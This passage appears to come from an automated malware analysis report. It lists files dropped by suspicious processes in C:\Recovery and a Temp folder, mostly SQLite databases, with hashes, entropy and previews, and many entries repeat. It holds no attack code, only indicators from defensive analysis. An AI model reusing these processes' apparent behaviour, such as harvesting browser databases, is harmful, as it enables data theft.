                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):25
                                                    Entropy (8bit):4.373660689688185
                                                    Encrypted:false
                                                    SSDEEP:3:eFiuipZ99Nn:oi7Z99N
                                                    MD5:E0D726C8A5E20EBDDB4008CA25C164A3
                                                    SHA1:A91912BAA7219DB92428D4961C455416E2235360
                                                    SHA-256:A9E46418CD28768CB6B2E540AA8AD6ACD3F35C4A359CA7FD81421C166D121E63
                                                    SHA-512:5BB898E0C64D6D4D8FC090B9BD87B003F5DDA8BF81012BD33D65F21056D3C944D0653592CF8AF6C4A4ABCDC343B7346F9525DEFF245AD0F070A153D64BF8D0D4
                                                    Malicious:false
                                                    Preview:co95uQGAbLxyKoSJzGojDXPRh
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
